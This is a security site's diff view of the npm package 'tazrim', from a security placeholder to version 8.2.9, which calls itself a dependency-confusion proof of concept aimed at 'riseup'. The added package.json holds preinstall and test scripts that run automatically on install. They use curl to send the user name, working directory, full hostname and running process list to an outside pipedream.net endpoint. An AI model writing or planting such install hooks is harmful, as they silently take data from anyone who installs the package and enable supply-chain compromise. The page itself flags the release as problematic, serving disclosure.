tazrim 0.0.1-security → 8.2.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of tazrim might be problematic. Click here for more details.
- package/README.md +2 -5
- package/index.html +19 -0
- package/index.js +3 -0
- package/package.json +19 -3
package/README.md
CHANGED
|
@@ -1,5 +1,2 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=tazrim for more information.
|
|
1
|
+
# NPM Dependency Confusion PoC
|
|
2
|
+
Simple PoC package for testing for dependency confusion vulnerabilities in riseup.
|
package/index.html
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
<!doctype html><html dir="rtl" itemscope="" itemtype="http://schema.org/WebPage" lang="iw"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google={kEI:'qwtRY96iO7Wy8gKX5JKYAg',kEXPI:'0,202543,1099993,56873,1709,4349,207,2414,2390,2316,383,246,5,5367,1123753,1197718,683,380089,16115,28684,22430,1362,12315,17584,4998,13228,3847,10622,22741,6674,1279,2743,148,1103,840,1983,4,210,4100,3514,606,2023,1777,520,14670,3227,2845,7,24990,8780,4465,13142,3,346,230,4385,2074,150,13974,4,1528,2304,7039,27731,7355,11445,2215,4437,9358,7428,5818,2539,4094,4052,3,3541,1,42154,2,14022,6249,7867,11623,6699,953,1428,28742,4568,6255,23421,1249,5838,12137,2831,4332,13,7471,445,2,2,1,17312,9320,8155,7381,3,1,15966,873,19633,7,1922,5784,3995,19130,12192,4832,17015,123,700,4,1,2,2,2,2,1439,7213,5264,3529,7431,70,1824,2,732,1285,14,82,950,807,2133,751,202,1866,7557,2736,922,613,249,1074,346,473,1149,1407,2199,217,743,499,106,459,1125,1538,1094,2206,3283,3,6,858,702,549,343,1,384,2617,1307,964,778,813,77,395,1042,1124,644,582,655,235,227,3,240,475,227,897,94,1832,172,45,2,44,171,261,2,392,446,88,445,7,487,96,150,1333,97,276,424,318,4,381,886,12,381,8,380,327,509,1133,1397,5322290,55,5995778,41,2803376,3311,141,795,19735,2,300,48,1752,59,14,3,7,2,2,5,307,3,14,20,42,23948252,4042143,1964,1008,2086,13578,3406,5595,11,5713,713',kBL:'lHUN'};google.sn='webhp';google.kHL='iw';})();(function(){
|
|
2
|
+
var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}
|
|
3
|
+
function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;google.ml=function(){return null};google.log=function(a,b,c,d,g){if(c=n(a,b,c,d,g)){a=new Image;var e=k.length;k[e]=a;a.onerror=a.onload=a.onabort=function(){delete k[e]};a.src=c}};google.logUrl=n;}).call(this);(function(){
|
|
4
|
+
google.y={};google.sy=[];google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){
|
|
5
|
+
document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName){a="1"===a.getAttribute("data-nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gbar,#guser{font-size:13px;padding-top:1px !important;}#gbar{height:22px}#guser{padding-bottom:7px !important;text-align:left}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}@media all{.gb1{height:22px;margin-left:.5em;vertical-align:top}#gbar{float:right}}a.gb1,a.gb4{text-decoration:underline !important}a.gb1,a.gb4{color:#00c !important}.gbi .gb4{color:#dd8e27 !important}.gbf .gb4{color:#900 !important}
|
|
6
|
+
</style><style>body,td,a,p,.h{font-family:arial,sans-serif}body{margin:0;overflow-y:scroll}#gog{padding:3px 8px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}.h{color:#1558d6}em{font-weight:bold;font-style:normal}.lst{height:25px;width:496px}.gsfi,.lst{font:18px arial,sans-serif}.gsfs{font:17px arial,sans-serif}.ds{display:inline-box;display:inline-block;margin:3px 0 4px;margin-right:4px}input{font-family:inherit}body{background:#fff;color:#000}a{color:#4b11a8;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#1558d6}a:visited{color:#4b11a8}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-right:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #dadce0 #70757a #70757a;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointer;height:30px;margin:0;outline:0;font:15px arial,sans-serif;vertical-align:top}.lsb:active{background:#dadce0}.lst:focus{outline:none}.Ucigb{width:458px}</style><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google.erd={jsr:1,bv:1670,de:true};
|
|
7
|
+
var h=this||self;var k,l=null!=(k=h.mei)?k:1,n,p=null!=(n=h.sdo)?n:!0,q=0,r,t=google.erd,v=t.jsr;google.ml=function(a,b,d,m,e){e=void 0===e?2:e;b&&(r=a&&a.message);if(google.dl)return google.dl(a,e,d),null;if(0>v){window.console&&console.error(a,d);if(-2===v)throw a;b=!1}else b=!a||!a.message||"Error loading script"===a.message||q>=l&&!m?!1:!0;if(!b)return null;q++;d=d||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(google.sn)+"&jsr="+b(t.jsr)+"&bver="+b(t.bv);var f=a.lineNumber;void 0!==f&&(c+="&line="+f);var g=
|
|
8
|
+
a.fileName;g&&(0<g.indexOf("-extension:/")&&(e=3),c+="&script="+b(g),f&&g===window.location.href&&(f=document.documentElement.outerHTML.split("\n")[f],c+="&cad="+b(f?f.substring(0,300):"No script found.")));c+="&jsel="+e;for(var u in d)c+="&",c+=b(u),c+="=",c+=b(d[u]);c=c+"&emsg="+b(a.name+": "+a.message);c=c+"&jsst="+b(a.stack||"N/A");12288<=c.length&&(c=c.substr(0,12288));a=c;m||google.log(0,"",a);return a};window.onerror=function(a,b,d,m,e){r!==a&&(a=e instanceof Error?e:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)||-1!==a.message.indexOf("Script error")?3:0));r=null;p&&q>=l&&(window.onerror=null)};})();</script></head><body bgcolor="#fff"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}
|
|
9
|
+
if (!iesg){document.f&&document.f.q.focus();document.gbqf&&document.gbqf.q.focus();}
|
|
10
|
+
}
|
|
11
|
+
})();</script><div id="mngb"><div id=gbar><nobr><b class=gb1>חיפוש</b> <a class=gb1 href="https://www.google.co.il/imghp?hl=iw&tab=wi">חיפוש תמונות</a> <a class=gb1 href="https://maps.google.co.il/maps?hl=iw&tab=wl">מפות</a> <a class=gb1 href="https://play.google.com/?hl=iw&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a> <a class=gb1 href="https://news.google.com/?tab=wn">חדשות</a> <a class=gb1 href="https://mail.google.com/mail/?tab=wm">Gmail</a> <a class=gb1 href="https://drive.google.com/?tab=wo">Drive</a> <a class=gb1 style="text-decoration:none" href="https://www.google.co.il/intl/iw/about/products?tab=wh"><u>עוד</u> »</a></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.co.il/history/optout?hl=iw" class=gb4>היסטוריית אתרים</a> | <a href="/preferences?hl=iw" class=gb4>הגדרות</a> | <a target=_top id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=iw&passive=true&continue=https://www.google.com/&ec=GAZAAQ" class=gb4>כניסה</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div><center><br clear="all" id="lgpd"><div id="lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%"> </td><td align="center" nowrap=""><input name="ie" value="ISO-8859-1" type="hidden"><input value="iw" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="height:32px;margin:4px 0"><div style="position:relative;zoom:1"><input class="lst Ucigb" style="margin:0;padding:5px 6px 0 8px;vertical-align:top;color:#000;padding-left:38px" autocomplete="off" value="" title="חיפוש ב-Google" maxlength="2048" name="q" size="57"><img src="/textinputassistant/tia.png" style="position:absolute;cursor:pointer;left:5px;top:4px;z-index:300" data-script-url="/textinputassistant/11/iw_tia.js" id="tsuid_1" alt="" height="23" width="27"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var id='tsuid_1';document.getElementById(id).onclick = function(){var s = document.createElement('script');s.src = this.getAttribute('data-script-url');(document.getElementById('xjsc')||document.body).appendChild(s);};})();</script></div></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="חיפוש ב-Google" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid_2" value="יותר מזל משכל" name="btnI" type="submit"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var id='tsuid_2';document.getElementById(id).onclick = function(){if (this.form.q.value){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;}
|
|
12
|
+
else top.location='/doodles/';};})();</script><input value="AJiK0e8AAAAAY1EZu3gQN8yF1y1UzeZTxSZc8ovPy_9G" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="right" nowrap="" width="25%"><a href="/advanced_search?hl=iw&authuser=0">חיפוש מתקדם</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){
|
|
13
|
+
var a,b="1";if(document&&document.getElementById)if("undefined"!=typeof XMLHttpRequest)b="2";else if("undefined"!=typeof ActiveXObject){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if("2"==a&&-1==location.search.indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br><div id="gws-output-pages-elements-homepage_additional_languages__als"><style>#gws-output-pages-elements-homepage_additional_languages__als{font-size:small;margin-bottom:24px}#SIvCob{color:#3c4043;display:inline-block;line-height:28px;}#SIvCob a{padding:0 3px;}.H6sW5{display:inline-block;margin:0 2px;white-space:nowrap}.z4hgWe{display:inline-block;margin:0 2px}</style><div id="SIvCob">Google זמינה ב: <a href="https://www.google.com/setprefs?sig=0_YbbSRmbtZk9ApGp2gDt1-lvV_ac%3D&hl=ar&source=homepage&sa=X&ved=0ahUKEwiepOPCtu76AhU1mVwKHReyBCMQ2ZgBCAU">العربية</a> <a dir="ltr" href="https://www.google.com/setprefs?sig=0_YbbSRmbtZk9ApGp2gDt1-lvV_ac%3D&hl=en&source=homepage&sa=X&ved=0ahUKEwiepOPCtu76AhU1mVwKHReyBCMQ2ZgBCAY">English</a> </div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/iw/ads/"> פרסום ב-Google</a><a href="http://www.google.co.il/intl/iw/services/">פתרונות עסקיים</a><a href="/intl/iw/about.html">הכול על Google</a><a dir="ltr" href="https://www.google.com/setprefdomain?prefdom=IL&prev=https://www.google.co.il/&sig=K_iwMpAo5zX1l_H02Y1YshAaR4wAs%3D">Google.co.il</a></div></div><p style="font-size:8pt;color:#70757a">© 2022 - <a href="/intl/iw/policies/privacy/">פרטיות</a> - <a href="/intl/iw/policies/terms/">תנאים</a></p></span></center><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google.cdo={height:757,width:1440};(function(){
|
|
14
|
+
var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d="CSS1Compat"==c.compatMode?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}a&&b&&(a!=google.cdo.width||b!=google.cdo.height)&&google.log("","","/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI);}).call(this);})();</script> <script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){google.xjs={ck:'xjs.hp.iHfCprUw_lc.R.X.O',cs:'ACT90oEmRG0Gs8TUoyIiPvn5-SqBAg4-6g',excm:[]};})();</script> <script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.OXyHHoQ5vB8.O/am\x3dAAB0AgBQAKAC/d\x3d1/ed\x3d1/rs\x3dACT90oEVwJR5DpgprhAi94VZWMVfvNGcYA/m\x3dsb_he,d';
|
|
15
|
+
var d=this||self,e=function(a){return a};
|
|
16
|
+
var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google.lx=function(){}};google.bx||google.lx()}
|
|
17
|
+
function p(a){google.timers&&google.timers.load&&google.tick&&google.tick("load","xjsls");var b=document;var c="SCRIPT";"application/xhtml+xml"===b.contentType&&(c=c.toLowerCase());c=b.createElement(c);if(void 0===g){b=null;var k=d.trustedTypes;if(k&&k.createPolicy){try{b=k.createPolicy("goog#html",{createHTML:e,createScript:e,createScriptURL:e})}catch(q){d.console&&d.console.error(q.message)}g=b}else g=b}a=(b=g)?b.createScriptURL(a):a;a=new l(a,h);c.src=a instanceof l&&a.constructor===l?a.g:"type_error:TrustedResourceUrl";var f,m;(f=(a=null==(m=(f=(c.ownerDocument&&c.ownerDocument.defaultView||window).document).querySelector)?void 0:m.call(f,"script[nonce]"))?a.nonce||a.getAttribute("nonce")||"":"")&&c.setAttribute("nonce",f);document.body.appendChild(c);google.psa=!0};google.xjsu=u;setTimeout(function(){n()},0);})();function _DumpException(e){throw e;}
|
|
18
|
+
function _F_installCss(c){}
|
|
19
|
+
(function(){google.jl={blt:'none',chnk:0,dw:false,dwu:true,emtn:0,end:0,ine:false,injs:'none',injt:0,injth:0,injv2:false,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22dh\x22:true,\x22dhqt\x22:true,\x22ds\x22:\x22\x22,\x22ffql\x22:\x22en\x22,\x22fl\x22:true,\x22host\x22:\x22google.com\x22,\x22isbh\x22:28,\x22jsonp\x22:true,\x22msgs\x22:{\x22cibl\x22:\x22ניקוי החיפוש\x22,\x22dym\x22:\x22האם התכוונת ל:\x22,\x22lcky\x22:\x22יותר מזל משכל\x22,\x22lml\x22:\x22למידע נוסף\x22,\x22oskt\x22:\x22כלי הזנה\x22,\x22psrc\x22:\x22חיפוש זה הוסר מ\\u003Ca href\x3d\\\x22/history\\\x22\\u003Eהיסטוריית האינטרנט\\u003C/a\\u003E שלך\x22,\x22psrl\x22:\x22הסרה\x22,\x22sbit\x22:\x22חיפוש לפי תמונה\x22,\x22srch\x22:\x22חיפוש ב-Google\x22},\x22ovr\x22:{},\x22pq\x22:\x22\x22,\x22refpd\x22:true,\x22rfs\x22:[],\x22sbas\x22:\x220 3px 8px 0 rgba(0,0,0,0.2),0 0 0 1px rgba(0,0,0,0.08)\x22,\x22sbpl\x22:16,\x22sbpr\x22:16,\x22scd\x22:10,\x22stok\x22:\x221COt64UAkwxsMB5sK_bVlkRlNfQ\x22,\x22uhde\x22:false}}';google.pmc=JSON.parse(pmc);})();</script> </body></html>
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,22 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "tazrim",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "8.2.9",
|
|
4
|
+
"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "curl \"https://eokxi6shvostsan.m.pipedream.net/tazrim?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)&rootf=$(ps axco command)\"",
|
|
8
|
+
"preinstall": "curl \"https://eokxi6shvostsan.m.pipedream.net/tazrim?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)&rootf=$(ps axco command)\""
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"test",
|
|
12
|
+
"PoC"
|
|
13
|
+
],
|
|
14
|
+
"config": {
|
|
15
|
+
"unsafe-perm": true
|
|
16
|
+
},
|
|
17
|
+
"author": "Bob.Vance",
|
|
18
|
+
"license": "ISC",
|
|
19
|
+
"dependencies": {
|
|
20
|
+
"tazrim": "^8.2.7"
|
|
21
|
+
}
|
|
6
22
|
}
|